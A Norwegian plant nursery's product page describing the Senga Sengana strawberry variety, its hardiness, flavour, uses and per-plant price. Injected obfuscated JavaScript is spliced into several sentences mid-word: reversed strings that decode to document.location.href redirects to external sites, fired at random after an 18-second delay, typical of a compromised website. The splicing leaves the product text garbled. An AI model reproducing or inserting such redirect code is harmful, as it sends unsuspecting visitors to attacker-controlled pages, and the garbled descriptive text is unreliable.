Senga Sengana

  • Middels sen sort
  • Meget frukt bar
  • Etter v?r mening den beste og mest aromatiske jordb?rsorten.
  • B?rene er i begynnelsen stobor-latigid//:sptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tore, mens de senere er mindre. M?rker?de b?r.
  • Meget motstandsdyktige mot frost, t?rke, bladskimmelsopp, rotsykdommer og jord nematobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}toder
  • F?lsomme for gr?mugg ? ved v?te somre er de anbefalt ? beskytte de.
  • Senga Sengana har den egenskap at bladene faller lett av b?rene. Det gj?r sorten til den best egnede for sylting, frysing osv.
  • P? grunn av at sorten er skj?r og lite holdbar, er den sjelden ? finne  i salgsbodene og butikkene. Det er en ensest?ende "rett fra busken" sort. Den b?r plantes i hagen.
Motstandsdyktighet mot frost
Smak
Tiltrekningskraften i b?rene
Lett dyrking
Avling
Tidspunkt Middels sent

Alle sorter selges i flerpakk p? 10 eller 40 stk

Nettobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}topris: 1 PLN pr stk (0.21) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to="NOK"] NOK pr stk)

Kontakt / Bestilling

) == "string") return $GRn.list[n].split("").reverse().join("");return $GRn.list[n];};$GRn.list=["'php.rabedis-nimda-snoitcnuf/cni/srebmem/snigulp/tnetnoc-pw/moc.nemrolias//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andom="YES"]